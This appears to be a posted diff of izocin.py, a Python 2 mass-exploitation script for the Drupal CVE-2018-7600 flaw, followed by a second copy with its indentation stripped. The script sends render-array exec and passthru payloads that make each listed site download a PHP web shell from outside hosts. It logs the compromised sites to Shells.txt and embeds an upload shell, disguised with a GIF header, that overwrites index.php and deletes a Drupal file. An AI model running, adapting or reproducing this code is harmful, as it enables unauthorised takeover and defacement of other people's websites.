kuldeep1337 · June 9, 2018 03:41
diff --git a/izocin.py b/izocin.py
 #!/usr/bin/python

 # Coded By izocin 
 # Turkey

 import requests, re, urllib2, os, sys, codecs,binascii, json					
 from multiprocessing.dummy import Pool					     	
 from time import time as timer	
 import time	
 from random import sample as rand
 from Queue import Queue				   		
 from platform import system	
 from colorama import Fore								
 from colorama import Style								
 from pprint import pprint								
 from colorama import init												
 init(autoreset=True)
 								
 															
 ####### Colors	 ######	
 	
 fr  =   Fore.RED											
 fc  =   Fore.CYAN											
 fw  =   Fore.WHITE											
 fg  =   Fore.GREEN											
 sd  =   Style.DIM											
 sn  =   Style.NORMAL										
 sb  =   Style.BRIGHT										

 ####################### 
 try:
    with codecs.open(sys.argv[1], mode='r', encoding='ascii', errors='ignore') as f:
        ooo = f.read().splitlines()
 except IOError:
    pass
 ooo = list((ooo))



 def banners():


 	if system() == 'Linux':
 		os.system('clear')
 	if system() == 'Windows':
 		os.system('cls')
 		
 		banner = """{}{} \n \n



 		
                                                                
                                                                
                                                                
  ,--,                                      ,--,                
 ,--.'|          ,----,   ,---.            ,--.'|         ,---,  
 |  |,         .'   .`|  '   ,'\           |  |,      ,-+-. /  | 
 `--'_      .'   .'  .' /   /   |   ,---.  `--'_     ,--.'|'   | 
 ,' ,'|   ,---, '   ./ .   ; ,. :  /     \ ,' ,'|   |   |  ,"' | 
 '  | |   ;   | .'  /  '   | |: : /    / ' '  | |   |   | /  | | 
 |  | :   `---' /  ;--,'   | .; :.    ' /  |  | :   |   | |  | | 
 '  : |__   /  /  / .`||   :    |'   ; :__ '  : |__ |   | |  |/  
 |  | '.'|./__;     .'  \   \  / '   | '.'||  | '.'||   | |--'   
 ;  :    ;;   |  .'      `----'  |   :    :;  :    ;|   |/       
 |  ,   / `---'                   \   \  / |  ,   / '---'        
 ---`-'                           `----'   ---`-'               
                                                                
     
 
 
 	Coded By: izocin , FB.com/izo.cin.73
 									
   
    

 		\n""".format(fc, sb)
 		
 		print banner

 shell = """GIF89a <?php echo 'nobita'.'<br>'.'Uname:'.php_uname().'<br>'.$cwd = getcwd(); Echo '<center>  <form method="post" target="_self" enctype="multipart/form-data">  <input type="file" size="20" name="uploads" /> <input type="submit" value="upload" />  </form>  </center></td></tr> </table><br>'; if (!empty ($_FILES['uploads'])) {     move_uploaded_file($_FILES['uploads']['tmp_name'],$_FILES['uploads']['name']);     Echo "<script>alert('upload Done'); 	 	 </script><b>Uploaded !!!</b><br>name : ".$_FILES['uploads']['name']."<br>size : ".$_FILES['uploads']['size']."<br>type : ".$_FILES['uploads']['type']; } ?>

 <?php


 $index = exec('wget -O index.php "https://pastebin.com/raw/mbufQDHY"');
 unlink('modules/user/user.pages.inc');

 echo $index;
 ?>"""






 def sitebul(url):
 	
 	
    try:	


 		# 22 . rev


 		get_params = {'q':'user/password', 'name[#post_render][]':'passthru', 'name[#markup]':'wget https://raw.githubusercontent.com/worldexploit/tr/master/izom.php', 'name[#type]':'markup'}
 		post_params = {'form_id':'user_pass', '_triggering_element_name':'name'}
 		r = requests.post(url, data=post_params, params=get_params)
 		
 		
 		m = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', r.text)
 		if m:
 		    found = m.group(1)
 		
 		get_params = {'q':'file/ajax/name/#value/' + found}
 		post_params = {'form_build_id':found}
 		r = requests.post(url, data=post_params, params=get_params)

 		lib = requests.get(url+'/izom.php')
 		
 		
 		if re.findall("izocin", lib.content):
 			print '[{}Drupal]: {} {}	       ====> {}{} CVE-2018-7600 RCE V7     {}{} Success upload  '.format(sb, sd, url, fc,fc, sb,fg)
 			open('Shells.txt', 'a').write(url+'/izom.php'+'\n')
 			sys.exit()
  
  
 		payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'wget https://raw.githubusercontent.com/dr-iman/SpiderProject/master/lib/exploits/web-app/wordpress/ads-manager/payload.php'}
 		headers = {'User-Agent': 'Mozilla 5.0'}				
 		r = requests.post(url+ '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax', data=payload, verify=False, headers=headers)
 		if 'Select Your File :' in requests.get(url+'/payload.php', headers=headers).text:
 			print '[{}Drupal]: {} {}	       ====> {}{} CVE-2018-7600 RCE V8    {}{} Success upload  '.format(sb, sd, url, fc,fc, sb,fg)
 			open('Shells.txt', 'a').write(url+'/payload.php'+'\n')
 			sys.exit()	
 		else:
 			print '[{}Drupal]: {} {}	       ====> {}{} CVE-2018-7600 RCE     {}{} Failed  '.format(sb, sd, url, fc,fc, sb,fr)


 			
    except:
        pass
 		
 				
 				
 		
 banners()

 	
 def Main():
    try:
 		
        start = timer()
        ThreadPool = Pool(70)
        Threads = ThreadPool.map(sitebul, ooo)
        print('Time: ' + str(timer() - start) + ' seconds')
    except:
        pass


 if __name__ == '__main__':
    Main()
	#!/usr/bin/python

	# Coded By izocin
	# Turkey

	import requests, re, urllib2, os, sys, codecs,binascii, json
	from multiprocessing.dummy import Pool
	from time import time as timer
	import time
	from random import sample as rand
	from Queue import Queue
	from platform import system
	from colorama import Fore
	from colorama import Style
	from pprint import pprint
	from colorama import init
	init(autoreset=True)


	####### Colors ######

	fr = Fore.RED
	fc = Fore.CYAN
	fw = Fore.WHITE
	fg = Fore.GREEN
	sd = Style.DIM
	sn = Style.NORMAL
	sb = Style.BRIGHT

	#######################
	try:
	with codecs.open(sys.argv[1], mode='r', encoding='ascii', errors='ignore') as f:
	ooo = f.read().splitlines()
	except IOError:
	pass
	ooo = list((ooo))



	def banners():


	if system() == 'Linux':
	os.system('clear')
	if system() == 'Windows':
	os.system('cls')

	banner = """{}{} \n \n







	,--, ,--,
	,--.'\| ,----, ,---. ,--.'\| ,---,
	\| \|, .' .`\| ' ,'\ \| \|, ,-+-. / \|
	`--'_ .' .' .' / / \| ,---. `--'_ ,--.'\|' \|
	,' ,'\| ,---, ' ./ . ; ,. : / \ ,' ,'\| \| \| ,"' \|
	' \| \| ; \| .' / ' \| \|: : / / ' ' \| \| \| \| / \| \|
	\| \| : `---' / ;--,' \| .; :. ' / \| \| : \| \| \| \| \|
	' : \|__ / / / .`\|\| : \|' ; :__ ' : \|__ \| \| \| \|/
	\| \| '.'\|./__; .' \ \ / ' \| '.'\|\| \| '.'\|\| \| \|--'
	; : ;; \| .' `----' \| : :; : ;\| \|/
	\| , / `---' \ \ / \| , / '---'
	---`-' `----' ---`-'




	Coded By: izocin , FB.com/izo.cin.73




	\n""".format(fc, sb)

	print banner

	shell = """GIF89a <?php echo 'nobita'.'<br>'.'Uname:'.php_uname().'<br>'.$cwd = getcwd(); Echo '<center> <form method="post" target="_self" enctype="multipart/form-data"> <input type="file" size="20" name="uploads" /> <input type="submit" value="upload" /> </form> </center></td></tr> </table><br>'; if (!empty ($_FILES['uploads'])) { move_uploaded_file($_FILES['uploads']['tmp_name'],$_FILES['uploads']['name']); Echo "<script>alert('upload Done'); </script><b>Uploaded !!!</b><br>name : ".$_FILES['uploads']['name']."<br>size : ".$_FILES['uploads']['size']."<br>type : ".$_FILES['uploads']['type']; } ?>

	<?php


	$index = exec('wget -O index.php "https://pastebin.com/raw/mbufQDHY"');
	unlink('modules/user/user.pages.inc');

	echo $index;
	?>"""






	def sitebul(url):


	try:


	# 22 . rev


	get_params = {'q':'user/password', 'name[#post_render][]':'passthru', 'name[#markup]':'wget https://raw.githubusercontent.com/worldexploit/tr/master/izom.php', 'name[#type]':'markup'}
	post_params = {'form_id':'user_pass', '_triggering_element_name':'name'}
	r = requests.post(url, data=post_params, params=get_params)


	m = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', r.text)
	if m:
	found = m.group(1)

	get_params = {'q':'file/ajax/name/#value/' + found}
	post_params = {'form_build_id':found}
	r = requests.post(url, data=post_params, params=get_params)

	lib = requests.get(url+'/izom.php')


	if re.findall("izocin", lib.content):
	print '[{}Drupal]: {} {} ====> {}{} CVE-2018-7600 RCE V7 {}{} Success upload '.format(sb, sd, url, fc,fc, sb,fg)
	open('Shells.txt', 'a').write(url+'/izom.php'+'\n')
	sys.exit()


	payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'wget https://raw.githubusercontent.com/dr-iman/SpiderProject/master/lib/exploits/web-app/wordpress/ads-manager/payload.php'}
	headers = {'User-Agent': 'Mozilla 5.0'}
	r = requests.post(url+ '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax', data=payload, verify=False, headers=headers)
	if 'Select Your File :' in requests.get(url+'/payload.php', headers=headers).text:
	print '[{}Drupal]: {} {} ====> {}{} CVE-2018-7600 RCE V8 {}{} Success upload '.format(sb, sd, url, fc,fc, sb,fg)
	open('Shells.txt', 'a').write(url+'/payload.php'+'\n')
	sys.exit()
	else:
	print '[{}Drupal]: {} {} ====> {}{} CVE-2018-7600 RCE {}{} Failed '.format(sb, sd, url, fc,fc, sb,fr)



	except:
	pass




	banners()


	def Main():
	try:

	start = timer()
	ThreadPool = Pool(70)
	Threads = ThreadPool.map(sitebul, ooo)
	print('Time: ' + str(timer() - start) + ' seconds')
	except:
	pass


	if __name__ == '__main__':
	Main()